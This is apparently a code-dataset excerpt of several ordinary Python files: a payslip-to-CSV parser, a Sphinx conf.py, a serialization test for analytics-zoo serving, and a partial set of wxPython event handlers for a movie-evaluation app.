address, metadata, payment_data = re.compile(r"^\s+?-+$", re.MULTILINE).split(payslip_text)
_, payment_headers, payments_table, totals_row, _, employer_total_footer = \
re.compile(r"^\s+?-+\|$", re.MULTILINE).split(payment_data)
metadata = parse_metadata(metadata)
payments, deductions, ytd_balances = parse_payments_table(payments_table)
totals = parse_totals(totals_row)
employer_totals = parse_employer_totals(employer_total_footer)
data = {
'p': payments,
'd': deductions,
'ytd': ytd_balances,
't': totals,
'et': employer_totals
}
return {
# 'address': address,
'm': metadata,
'd': data
}
def print_payslip(dd, indent=""):
for k, v in dd.items():
if not hasattr(v, 'items'):
print(f"{k}:\n{v}")
# print(['*'] * 30)
else:
print(f"{k}:\n")
print_payslip(v, indent=indent + " ")
def count_fields(counts, nested_dict, prefix=''):
if hasattr(nested_dict, 'items'):
for k, v in nested_dict.items():
count_fields(counts, v, prefix=prefix + '.' + k)
else:
counts[prefix] += 1
def flatten(nested_dict, flat_dict, prefix=''):
if hasattr(nested_dict, 'items'):
for k, v in nested_dict.items():
flatten(v, flat_dict, prefix=prefix + '.' + k)
else:
flat_dict[prefix] = nested_dict
def write_payslip_csv_month_rows(categories, csv_table):
with open('payslips-month-rows.csv', 'w', newline='', encoding='utf-8') as csvfile:
writer = csv.DictWriter(csvfile, fieldnames=categories)
writer.writeheader()
for row in csv_table:
writer.writerow(row)
def write_payslip_csv_month_columns(columns, csv_table):
with open('payslips-month-columns.csv', 'w', newline='', encoding='utf-8') as csvfile:
writer = csv.DictWriter(csvfile, fieldnames=columns)
# writer.writeheader()
for row in csv_table:
writer.writerow(row)
def partition(pred, iterable):
'Use a predicate to partition entries into false entries and true entries'
# partition(is_odd, range(10)) --> 0 2 4 6 8 and 1 3 5 7 9
from itertools import tee
from itertools import filterfalse
t1, t2 = tee(iterable)
return filterfalse(pred, t1), filter(pred, t2)
def enforce_order(iterable, prefixes: list):
remainder = iterable
result = []
for prefix in prefixes:
remainder, matching = partition(lambda x: x.startswith(prefix), remainder)
remainder = list(remainder)
result += sorted(matching)
result += sorted(remainder)
return result
if __name__ == '__main__':
payslips_dir = Path(sys.argv[1])
counts = collections.Counter()
csv_rows_table = []
for payslip_file in sorted(payslips_dir.glob('*.txt')):
# if payslip_file.name < '2018-04-' or payslip_file.name > '2019-04-':
# continue
payslip_text = payslip_file.read_text(encoding='utf-8')
if 'Employee Number' not in payslip_text:
print(f"Skipping {payslip_file} ...")
continue
print(f"Parsing {payslip_file} ...")
payslip = parse_payslip(payslip_text)
count_fields(counts, payslip)
flat_payslip = {}
flatten(payslip, flat_payslip)
csv_rows_table.append(flat_payslip)
categories = counts.keys()
categories = enforce_order(categories, FIELDS_ORDER)
# pprint('\n'.join(categories))
# print(len(categories))
write_payslip_csv_month_rows(categories, csv_rows_table)
for unwanted_field in UNWANTED_FIELDS:
categories.remove(unwanted_field)
csv_cols_table = []
columns = [HEADER_FIELD, *[payslip[HEADER_FIELD] for payslip in csv_rows_table]]
for category in categories:
category_row = OrderedDict()
category_row[HEADER_FIELD] = category
for payslip in csv_rows_table:
month = payslip[HEADER_FIELD]
category_row[month] = payslip.get(category)
csv_cols_table.append(category_row)
write_payslip_csv_month_columns(columns, csv_cols_table)
print("Done.")
| 30.889381
| 103
| 0.624409
|
import collections
import csv
import re
import sys
from collections import OrderedDict
from pathlib import Path
HEADER_FIELD = '.m.Pay Date'
FIELDS_ORDER = [
HEADER_FIELD, '.m.Pay', '.m.',
'.d.p',
'.d.d',
'.d.t',
'.d.et',
'.d.ytd',
]
UNWANTED_FIELDS = [
'.m.Company Name', '.m.Account', '.m.Sort Code', '.m.NI Number', '.m.NI Category', '.m.Pay Method',
]
def parse_amount(amount: str):
amount = amount.replace(',', '')
if amount.endswith('-'):
return -float(amount[:-1])
else:
return float(amount)
def parse_metadata(metadata_text: str):
metadata = {}
for row in metadata_text.splitlines():
if not row:
continue
_, cell1, cell2, cell3, _ = row.split('|')
for cell in [cell1, cell2, cell3]:
cell = cell.strip()
if cell:
separator_regex = r':\s+' if ':' in cell else r'\s\s+'
item, value = re.compile(separator_regex).split(cell, maxsplit=1)
metadata[item.strip()] = value.strip()
return metadata
def parse_payments_table(payments_table: str):
payments = {}
deductions = {}
ytd_balances = {}
for row in payments_table.splitlines():
row = row.strip()
if not row:
continue
_, payment, deduction, ytd_balance, _ = row.split('|')
payment = payment.strip()
if payment:
payment_item, amount = re.compile(r'\s\s+').split(payment)
payments[payment_item] = parse_amount(amount)
deduction = deduction.strip()
if deduction:
deduction_item, amount = re.compile(r'\s\s+').split(deduction)
deductions[deduction_item] = parse_amount(amount)
ytd_balance = ytd_balance.strip()
if ytd_balance:
ytd_balance_item, amount = re.compile(r'\s\s+').split(ytd_balance)
ytd_balances[ytd_balance_item] = parse_amount(amount)
return payments, deductions, ytd_balances
def parse_totals(totals_row: str):
totals = {}
_, payment_total, deduction_total, net_pay, _ = totals_row.split('|')
for total_value in [payment_total, deduction_total, net_pay]:
item, amount = re.compile(r':\s+').split(total_value.strip())
totals[item] = parse_amount(amount)
return totals
def parse_employer_totals(employer_total_footer):
totals = {}
for row in employer_total_footer.strip().splitlines()[1:]:
row = row.strip()
if not row or row.count('|') != 4:
continue
_, this_employer_cell, _ = row.split('|', maxsplit=2)
item, amount = re.compile(r'\s\s+').split(this_employer_cell.strip())
totals[item] = parse_amount(amount)
return totals
def parse_payslip(payslip_text: str):
address, metadata, payment_data = re.compile(r"^\s+?-+$", re.MULTILINE).split(payslip_text)
_, payment_headers, payments_table, totals_row, _, employer_total_footer = \
re.compile(r"^\s+?-+\|$", re.MULTILINE).split(payment_data)
metadata = parse_metadata(metadata)
payments, deductions, ytd_balances = parse_payments_table(payments_table)
totals = parse_totals(totals_row)
employer_totals = parse_employer_totals(employer_total_footer)
data = {
'p': payments,
'd': deductions,
'ytd': ytd_balances,
't': totals,
'et': employer_totals
}
return {
'm': metadata,
'd': data
}
def print_payslip(dd, indent=""):
for k, v in dd.items():
if not hasattr(v, 'items'):
print(f"{k}:\n{v}")
else:
print(f"{k}:\n")
print_payslip(v, indent=indent + " ")
def count_fields(counts, nested_dict, prefix=''):
if hasattr(nested_dict, 'items'):
for k, v in nested_dict.items():
count_fields(counts, v, prefix=prefix + '.' + k)
else:
counts[prefix] += 1
def flatten(nested_dict, flat_dict, prefix=''):
if hasattr(nested_dict, 'items'):
for k, v in nested_dict.items():
flatten(v, flat_dict, prefix=prefix + '.' + k)
else:
flat_dict[prefix] = nested_dict
def write_payslip_csv_month_rows(categories, csv_table):
with open('payslips-month-rows.csv', 'w', newline='', encoding='utf-8') as csvfile:
writer = csv.DictWriter(csvfile, fieldnames=categories)
writer.writeheader()
for row in csv_table:
writer.writerow(row)
def write_payslip_csv_month_columns(columns, csv_table):
with open('payslips-month-columns.csv', 'w', newline='', encoding='utf-8') as csvfile:
writer = csv.DictWriter(csvfile, fieldnames=columns)
for row in csv_table:
writer.writerow(row)
def partition(pred, iterable):
from itertools import tee
from itertools import filterfalse
t1, t2 = tee(iterable)
return filterfalse(pred, t1), filter(pred, t2)
def enforce_order(iterable, prefixes: list):
remainder = iterable
result = []
for prefix in prefixes:
remainder, matching = partition(lambda x: x.startswith(prefix), remainder)
remainder = list(remainder)
result += sorted(matching)
result += sorted(remainder)
return result
if __name__ == '__main__':
payslips_dir = Path(sys.argv[1])
counts = collections.Counter()
csv_rows_table = []
for payslip_file in sorted(payslips_dir.glob('*.txt')):
payslip_text = payslip_file.read_text(encoding='utf-8')
if 'Employee Number' not in payslip_text:
print(f"Skipping {payslip_file} ...")
continue
print(f"Parsing {payslip_file} ...")
payslip = parse_payslip(payslip_text)
count_fields(counts, payslip)
flat_payslip = {}
flatten(payslip, flat_payslip)
csv_rows_table.append(flat_payslip)
categories = counts.keys()
categories = enforce_order(categories, FIELDS_ORDER)
write_payslip_csv_month_rows(categories, csv_rows_table)
for unwanted_field in UNWANTED_FIELDS:
categories.remove(unwanted_field)
csv_cols_table = []
columns = [HEADER_FIELD, *[payslip[HEADER_FIELD] for payslip in csv_rows_table]]
for category in categories:
category_row = OrderedDict()
category_row[HEADER_FIELD] = category
for payslip in csv_rows_table:
month = payslip[HEADER_FIELD]
category_row[month] = payslip.get(category)
csv_cols_table.append(category_row)
write_payslip_csv_month_columns(columns, csv_cols_table)
print("Done.")
| true
| true
|
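The trailing-minus convention handled by parse_amount in the script above is its one non-obvious parsing rule; a minimal standalone sketch (amounts invented for illustration only) shows the intended behaviour:

# Standalone sketch of the trailing-minus amount convention; values are made up.
def parse_amount_sketch(amount: str) -> float:
    amount = amount.replace(',', '')        # strip thousands separators
    if amount.endswith('-'):                # payroll prints negatives as "87.10-"
        return -float(amount[:-1])
    return float(amount)

assert parse_amount_sketch('1,234.50') == 1234.50
assert parse_amount_sketch('87.10-') == -87.10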
1c422c3e02bebbc8def8f727bb5f9427050dd1c2
| 5,960
|
py
|
Python
|
docs/source/conf.py
|
LourensVeen/simple-cwl-xenon-service
|
f8ff51629d1198200bd84d59e78ca456321af940
|
[
"Apache-2.0"
] | 10
|
2017-09-07T10:25:33.000Z
|
2021-01-20T00:32:31.000Z
|
docs/source/conf.py
|
MD-Studio/cerise
|
f8ff51629d1198200bd84d59e78ca456321af940
|
[
"Apache-2.0"
] | 52
|
2017-08-22T09:53:35.000Z
|
2021-08-19T08:24:16.000Z
|
docs/source/conf.py
|
LourensVeen/simple-cwl-xenon-service
|
f8ff51629d1198200bd84d59e78ca456321af940
|
[
"Apache-2.0"
] | 3
|
2017-11-13T22:01:37.000Z
|
2021-08-14T10:50:21.000Z
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# cerise documentation build configuration file, created by
# sphinx-quickstart on Wed Apr 19 10:25:17 2017.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
import os
import sys
sys.path.insert(0, os.path.join(os.path.dirname(__file__), '../../'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = ['sphinx.ext.autodoc',
'sphinx.ext.napoleon',
'sphinx.ext.todo',
'sphinx.ext.viewcode']
# Add any paths that contain templates here, relative to this directory.
# templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
#
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = 'cerise'
copyright = '2017 Netherlands eScience Center and VU University Amsterdam'
author = 'Lourens Veen'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = 'develop'
# The full version, including alpha/beta/rc tags.
release = 'develop'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = 'en'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# These patterns also affect html_static_path and html_extra_path
exclude_patterns = ['_build', 'Thumbs.db', '.DS_Store']
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = True
# Also document constructors.
autoclass_content = 'both'
# -- Run apidoc plug-in manually, as readthedocs doesn't support it -------
# See https://github.com/rtfd/readthedocs.org/issues/1139
def run_apidoc(_):
from sphinx.apidoc import main
cur_dir = os.path.abspath(os.path.dirname(__file__))
sys.path.append(os.path.join(cur_dir, '..', '..', 'cerise'))
module = os.path.join(cur_dir, '..', '..', 'cerise')
output_dir = os.path.join(cur_dir, 'apidocs')
main(['-e', '-o', output_dir, module, '--force'])
def setup(app):
app.connect('builder-inited', run_apidoc)
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = 'sphinx_rtd_theme'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#
# html_theme_options = {}
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
# html_static_path = ['_static']
# -- Options for HTMLHelp output ------------------------------------------
# Output file base name for HTML help builder.
htmlhelp_basename = 'cerisedoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#
# 'preamble': '',
# Latex figure (float) alignment
#
# 'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'cerise.tex', 'Cerise Documentation',
'Lourens Veen', 'manual'),
]
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'cerise', 'Cerise Documentation',
[author], 1)
]
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'cerise', 'Cerise Documentation',
author, 'cerise', 'One line description of project.',
'Miscellaneous'),
]
# -- Options for Epub output ----------------------------------------------
# Bibliographic Dublin Core info.
epub_title = project
epub_author = author
epub_publisher = author
epub_copyright = copyright
# The unique identifier of the text. This can be a ISBN number
# or the project homepage.
#
# epub_identifier = ''
# A unique identification for the text.
#
# epub_uid = ''
# A list of files that should not be packed into the epub file.
epub_exclude_files = ['search.html']
| 30.408163
| 79
| 0.677685
|
import os
import sys
sys.path.insert(0, os.path.join(os.path.dirname(__file__), '../../'))
extensions = ['sphinx.ext.autodoc',
'sphinx.ext.napoleon',
'sphinx.ext.todo',
'sphinx.ext.viewcode']
source_suffix = '.rst'
master_doc = 'index'
project = 'cerise'
copyright = '2017 Netherlands eScience Center and VU University Amsterdam'
author = 'Lourens Veen'
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = 'develop'
# The full version, including alpha/beta/rc tags.
release = 'develop'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = 'en'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# These patterns also affect html_static_path and html_extra_path
exclude_patterns = ['_build', 'Thumbs.db', '.DS_Store']
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = True
# Also document constructors.
autoclass_content = 'both'
# -- Run apidoc plug-in manually, as readthedocs doesn't support it -------
def run_apidoc(_):
from sphinx.apidoc import main
cur_dir = os.path.abspath(os.path.dirname(__file__))
sys.path.append(os.path.join(cur_dir, '..', '..', 'cerise'))
module = os.path.join(cur_dir, '..', '..', 'cerise')
output_dir = os.path.join(cur_dir, 'apidocs')
main(['-e', '-o', output_dir, module, '--force'])
def setup(app):
app.connect('builder-inited', run_apidoc)
html_theme = 'sphinx_rtd_theme'
htmlhelp_basename = 'cerisedoc'
latex_elements = {
}
latex_documents = [
(master_doc, 'cerise.tex', 'Cerise Documentation',
'Lourens Veen', 'manual'),
]
man_pages = [
(master_doc, 'cerise', 'Cerise Documentation',
[author], 1)
]
texinfo_documents = [
(master_doc, 'cerise', 'Cerise Documentation',
author, 'cerise', 'One line description of project.',
'Miscellaneous'),
]
epub_title = project
epub_author = author
epub_publisher = author
epub_copyright = copyright
epub_exclude_files = ['search.html']
| true
| true
|
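The run_apidoc hook in the conf.py above imports sphinx.apidoc, which only exists in older Sphinx releases; a hedged variant for Sphinx >= 1.7 (where the module moved to sphinx.ext.apidoc and main() takes the bare argument list) would be:

# Sketch for newer Sphinx; same arguments as the hook above.
import os
import sys

def run_apidoc(_):
    from sphinx.ext.apidoc import main
    cur_dir = os.path.abspath(os.path.dirname(__file__))
    sys.path.append(os.path.join(cur_dir, '..', '..', 'cerise'))
    module = os.path.join(cur_dir, '..', '..', 'cerise')
    output_dir = os.path.join(cur_dir, 'apidocs')
    main(['-e', '-o', output_dir, module, '--force'])

def setup(app):
    app.connect('builder-inited', run_apidoc)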
1c422cfb212b27838ec057a950c0547282063541
| 1,320
|
py
|
Python
|
pyzoo/test/zoo/serving/test_serialization.py
|
hkvision/analytics-zoo
|
aee693a0604db5b5d01540d5d414b644313d5d22
|
[
"Apache-2.0"
] | null | null | null |
pyzoo/test/zoo/serving/test_serialization.py
|
hkvision/analytics-zoo
|
aee693a0604db5b5d01540d5d414b644313d5d22
|
[
"Apache-2.0"
] | 1
|
2020-11-19T09:18:01.000Z
|
2020-11-20T07:14:21.000Z
|
pyzoo/test/zoo/serving/test_serialization.py
|
hkvision/analytics-zoo
|
aee693a0604db5b5d01540d5d414b644313d5d22
|
[
"Apache-2.0"
] | null | null | null |
#
# Copyright 2018 Analytics Zoo Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import numpy as np
import base64
from zoo.serving.client import InputQueue, OutputQueue, http_response_to_ndarray
import os
resource_path = os.path.join(os.path.split(__file__)[0], "../resources")
class TestSerialization:
def test_encode(self):
input_api = InputQueue()
b64 = input_api.data_to_b64(t1=np.array([1, 2]), t2=np.array([3, 4]))
byte = base64.b64decode(b64)
def test_http_response_to_ndarray(self):
with open(os.path.join(resource_path, "serving/http_response")) as f:
data = f.read()
arr = http_response_to_ndarray(data)
assert isinstance(arr, np.ndarray)
assert len(arr.shape) == 1
assert arr.shape[0] == 128
| 32.195122
| 80
| 0.701515
|
import numpy as np
import base64
from zoo.serving.client import InputQueue, OutputQueue, http_response_to_ndarray
import os
resource_path = os.path.join(os.path.split(__file__)[0], "../resources")
class TestSerialization:
def test_encode(self):
input_api = InputQueue()
b64 = input_api.data_to_b64(t1=np.array([1, 2]), t2=np.array([3, 4]))
byte = base64.b64decode(b64)
def test_http_response_to_ndarray(self):
with open(os.path.join(resource_path, "serving/http_response")) as f:
data = f.read()
arr = http_response_to_ndarray(data)
assert isinstance(arr, np.ndarray)
assert len(arr.shape) == 1
assert arr.shape[0] == 128
| true
| true
|
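The encode test above exercises the zoo client's data_to_b64 helper; for reference, a plain numpy/base64 round trip (independent of the analytics-zoo API) looks like this:

# Generic base64 round trip for an ndarray; not the analytics-zoo API.
import base64
import numpy as np

arr = np.array([1, 2], dtype=np.int64)
b64 = base64.b64encode(arr.tobytes()).decode('ascii')
restored = np.frombuffer(base64.b64decode(b64), dtype=np.int64)
assert (restored == arr).all()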
1c422d734a930cbdf97d4c899dd2c2c62930bff4
| 9,073
|
py
|
Python
|
src/wx/event_handlers.py
|
z80lives/affective-movie-evaluator
|
c22e0d75166c9c26cbca276c70b38c1f6419bfe0
|
[
"MIT"
] | null | null | null |
src/wx/event_handlers.py
|
z80lives/affective-movie-evaluator
|
c22e0d75166c9c26cbca276c70b38c1f6419bfe0
|
[
"MIT"
] | 1
|
2019-11-16T23:43:28.000Z
|
2019-11-16T23:43:28.000Z
|
src/wx/event_handlers.py
|
z80lives/affective-movie-evaluator
|
c22e0d75166c9c26cbca276c70b38c1f6419bfe0
|
[
"MIT"
] | null | null | null |
import wx
from src.playback import RecordSystem, VLCPlayer
from src.utils import SampleLoader, SampleController, MovieController, PersonController
from src.wx.record import RecordTabPanel, CameraCaptureFrame
from src.wx.analyse_movie import AnalyseMovieTabPanel
from src.wx.samples import SampleTabPanel, SampleTabFrame
#from src.wx.analyse import AnalyseMovieTab
from src.wx.movies import MoviesPanel
from src.wx.person import PersonPanel
from src.gsr import GSRSensor
def analyse_func(video_dir, video_file_name, fer,head,body,preview,_print):
if fer:
_print("Analysing facial keypoints...")
from FER.ferAnalysis import FaceSystem
system = FaceSystem()
system.analyse(video_file_name, preview)
if head:
from src.headpose import HeadPoseEstimator
sys = HeadPoseEstimator()
#sys._print = _print
_print("Analysing body keypoints...")
loader = SampleLoader(video_dir)
sys.analyse(loader.getVideoFile(), loader.getDir()+"head_points.npy", preview)
if body:
_print("Initializing pose system")
from src.openpose import PoseSystem
sys = PoseSystem()
_print("Analysing body keypoints ")
loader = SampleLoader(video_dir)  # use the sample directory, matching the head-pose branch above
sys.analyse(loader.getVideoFile(), loader.getDir()+"body_points.npy", preview)
class CPanelEventHandlers:
recordTab = None
moviesTab = None
personTab = None
analyse_process=None
def onQuit(self, event):
self.Close(True)
def onAbout(self, event):
msg = "Created by Ibrahim & Faith for FYP\n\t HELP School of ICT \n\t 2019"
dlg = wx.MessageDialog(self, msg, "Affective Movie Evaluator", wx.OK)
dlg.ShowModal()
dlg.Destroy()
#print()
def newRecord(self, event):
self.print("Creating a new record")
def onNewSample(self, event):
class EmptyClass: pass
controllers = EmptyClass()
controllers.personController = PersonController()
controllers.movieController = MovieController()
controllers.sampleController = SampleController()
controllers.recordSystem = RecordSystem()
controllers.mediaplayer = VLCPlayer
#controllers.gsr = GSRSensor()
recordTab = RecordTabPanel(self.panel_notebook, self, controllers)
idx = self.panel_notebook.AddPage(recordTab, "Record Screening")
self.Layout()
def onMovieAnalyse(self, event):
class EmptyClass: pass
controllers = EmptyClass()
controllers.movieController = MovieController()
controllers.sampleController = SampleController()
controllers.mediaplayer = VLCPlayer
controllers.sampleController.read_dirs()
screeningTab = AnalyseMovieTabPanel(self.panel_notebook, self, controllers)
idx = self.panel_notebook.AddPage(screeningTab, "Screening Tab")
self.Layout()
def onNewScreening(self, event):
pass
def onNew(self, event):
#file selector dialog
with wx.FileDialog(self, "Open a movie file", wildcard="mp4 files (*.mp5)|*.mp4",
style=wx.FD_OPEN | wx.FD_FILE_MUST_EXIST) as fileDialog:
if fileDialog.ShowModal() == wx.ID_CANCEL:
return
pathname = fileDialog.GetPath()
self.print("File %s found!"% (pathname))
sys = RecordSystem()
msys = MovieController()
msys.read_files()
mdata = msys.getMovieByFile(pathname)
#try:
# with open(pathname, 'r') as file:
# self.doLoadDataOrWhatever(file)
#except IOError:
# wx.LogError("Cannot open file '%s'." % newfile)
#open the tab later
recordTab = RecordTabPanel(self.panel_notebook, self)
idx = self.panel_notebook.AddPage(recordTab, "Record Screening")
#auto fill text fields
recordTab.form.txtMovieFile.SetValue(pathname)
inp_map = {
"name": recordTab.form.txtMovieName,
"year": recordTab.form.txtYear,
"genre": recordTab.form.txtGenre,
"tags": recordTab.form.txtTag
}
self.recordTab = recordTab
for k in inp_map:
try:
inpField = inp_map[k]
inpField.SetValue(mdata[k])
except KeyError: # ignore if the key doesn't exist
continue
#self.do_layout()
self.Layout()
def onMoviesTab(self, event):
if self.moviesTab is None:
tab_title = "Movies Panel"
movieController = MovieController()
moviesTab = MoviesPanel(self.panel_notebook, self, tab_title, movieController)
idx = self.panel_notebook.AddPage(moviesTab, tab_title)
self.moviesTab = moviesTab
else:
self.moviesTab.onCloseTab(event)
def onPersonTab(self, event):
if self.personTab is None:
tab_title = "Person Panel"
person_controller = PersonController()
personTab = PersonPanel(self.panel_notebook, self, tab_title, person_controller)
idx = self.panel_notebook.AddPage(personTab, tab_title)
self.personTab = personTab
else:
self.personTab.onCloseTab(event)
def onCloseTab(self, event):
self.delPage("Record Screening")
self.Layout()
def onCloseAnalyserTab(self, event):
self.onStopProcess(event)
self.delPage("Analyse Sample")
self.Layout()
def onRecord(self, event, form):
sys = RecordSystem()
msys = MovieController()
msys.read_files()
person = form.txtPerson.GetValue()
movie_path = form.txtMovieFile.GetValue()
mdata = msys.getMovieByFile(movie_path)
file_name = msys.get_dir() + msys.getMovieObjById(mdata['id']).filename
data = {"movie_id": "%s"%(mdata["id"]),"subject_name": person}
player = VLCPlayer(file_name)
sys = RecordSystem()
filename = sys.createSampleDir()
sys.saveMetaData(filename, data)
sys.start_recording("sample", player, False, filename)
self.print("Record complete...")
self.print("New sample created. sample_id= %s"%(filename))
def onSampleMenu(self, event):
if self.recordTab is not None:
self.recordTab.Close()
#print("Sample Menu")
#sampleTab = SampleTabPanel(self.panel_notebook, self)
#self.panel_notebook.AddPage(sampleTab, "Sample Records")
class EmptyClass: pass
controllers = EmptyClass()
controllers.personController = PersonController()
controllers.movieController = MovieController()
controllers.sampleController = SampleController()
sampleFrame = SampleTabFrame(controllers)
sampleFrame.Show()
self.Layout()
def onCaptureTestButton(self, event):
self.print("Camera Capture event started.")
captureFrame = CameraCaptureFrame()
captureFrame.Show()
self.Layout()
def onAnalyseMenu(self, event):
with wx.FileDialog(self, "Open a sample file", wildcard="avi files (*.avi)|*.avi",
style=wx.FD_OPEN | wx.FD_FILE_MUST_EXIST) as fileDialog:
if fileDialog.ShowModal() == wx.ID_CANCEL:
return
pathname = fileDialog.GetPath()
self.print("File %s found!"% (pathname))
_sid = pathname[:pathname.rindex("/")]
_sid = _sid[_sid.rindex("/")+1:]
analyseTab = AnalyseMovieTabPanel(self.panel_notebook, self, _sid)
self.panel_notebook.AddPage(analyseTab, "Analyse Sample")
self.Layout()
def onAnalyse(self, event, sid, form):
#import sys, time, threading
from multiprocessing import Process
fer = form.chkFER.GetValue()
head = form.chkBEGR.GetValue()
body = False
preview = form.chkPreview.GetValue()
video_file_name = "./data/"+sid+ "/test.avi"
video_dir = "./data/"+sid+"/"
if not preview:
p = Process(name='process',
target=analyse_func,
args=(video_dir, video_file_name,
fer,head,body,preview,self.print,) )
p.start()
else:
analyse_func(video_dir, video_file_name,
fer,head,body,preview,self.print)
self.analyse_process = p if not preview else None  # a background Process exists only when not previewing
def onStopProcess(self, event):
if self.analyse_process is not None:
self.analyse_process.terminate()
def delPage(self, pageTitle):
for index in range(self.panel_notebook.GetPageCount()):
if self.panel_notebook.GetPageText(index) == pageTitle:
self.panel_notebook.DeletePage(index)
self.panel_notebook.SendSizeEvent()
break
| 34.896154
| 92
| 0.616114
|
import wx
from src.playback import RecordSystem, VLCPlayer
from src.utils import SampleLoader, SampleController, MovieController, PersonController
from src.wx.record import RecordTabPanel, CameraCaptureFrame
from src.wx.analyse_movie import AnalyseMovieTabPanel
from src.wx.samples import SampleTabPanel, SampleTabFrame
from src.wx.movies import MoviesPanel
from src.wx.person import PersonPanel
from src.gsr import GSRSensor
def analyse_func(video_dir, video_file_name, fer,head,body,preview,_print):
if fer:
_print("Analysing facial keypoints...")
from FER.ferAnalysis import FaceSystem
system = FaceSystem()
system.analyse(video_file_name, preview)
if head:
from src.headpose import HeadPoseEstimator
sys = HeadPoseEstimator()
_print("Analysing body keypoints...")
loader = SampleLoader(video_dir)
sys.analyse(loader.getVideoFile(), loader.getDir()+"head_points.npy", preview)
if body:
_print("Initializing pose system")
from src.openpose import PoseSystem
sys = PoseSystem()
_print("Analysing body keypoints ")
loader = SampleLoader(video_dir)
sys.analyse(loader.getVideoFile(), loader.getDir()+"body_points.npy", preview)
class CPanelEventHandlers:
recordTab = None
moviesTab = None
personTab = None
analyse_process=None
def onQuit(self, event):
self.Close(True)
def onAbout(self, event):
msg = "Created by Ibrahim & Faith for FYP\n\t HELP School of ICT \n\t 2019"
dlg = wx.MessageDialog(self, msg, "Affective Movie Evaluator", wx.OK)
dlg.ShowModal()
dlg.Destroy()
def newRecord(self, event):
self.print("Creating a new record")
def onNewSample(self, event):
class EmptyClass: pass
controllers = EmptyClass()
controllers.personController = PersonController()
controllers.movieController = MovieController()
controllers.sampleController = SampleController()
controllers.recordSystem = RecordSystem()
controllers.mediaplayer = VLCPlayer
recordTab = RecordTabPanel(self.panel_notebook, self, controllers)
idx = self.panel_notebook.AddPage(recordTab, "Record Screening")
self.Layout()
def onMovieAnalyse(self, event):
class EmptyClass: pass
controllers = EmptyClass()
controllers.movieController = MovieController()
controllers.sampleController = SampleController()
controllers.mediaplayer = VLCPlayer
controllers.sampleController.read_dirs()
screeningTab = AnalyseMovieTabPanel(self.panel_notebook, self, controllers)
idx = self.panel_notebook.AddPage(screeningTab, "Screening Tab")
self.Layout()
def onNewScreening(self, event):
pass
def onNew(self, event):
with wx.FileDialog(self, "Open a movie file", wildcard="mp4 files (*.mp5)|*.mp4",
style=wx.FD_OPEN | wx.FD_FILE_MUST_EXIST) as fileDialog:
if fileDialog.ShowModal() == wx.ID_CANCEL:
return
pathname = fileDialog.GetPath()
self.print("File %s found!"% (pathname))
sys = RecordSystem()
msys = MovieController()
msys.read_files()
mdata = msys.getMovieByFile(pathname)
recordTab = RecordTabPanel(self.panel_notebook, self)
idx = self.panel_notebook.AddPage(recordTab, "Record Screening")
recordTab.form.txtMovieFile.SetValue(pathname)
inp_map = {
"name": recordTab.form.txtMovieName,
"year": recordTab.form.txtYear,
"genre": recordTab.form.txtGenre,
"tags": recordTab.form.txtTag
}
self.recordTab = recordTab
for k in inp_map:
try:
inpField = inp_map[k]
inpField.SetValue(mdata[k])
except KeyError:
continue
self.Layout()
def onMoviesTab(self, event):
if self.moviesTab is None:
tab_title = "Movies Panel"
movieController = MovieController()
moviesTab = MoviesPanel(self.panel_notebook, self, tab_title, movieController)
idx = self.panel_notebook.AddPage(moviesTab, tab_title)
self.moviesTab = moviesTab
else:
self.moviesTab.onCloseTab(event)
def onPersonTab(self, event):
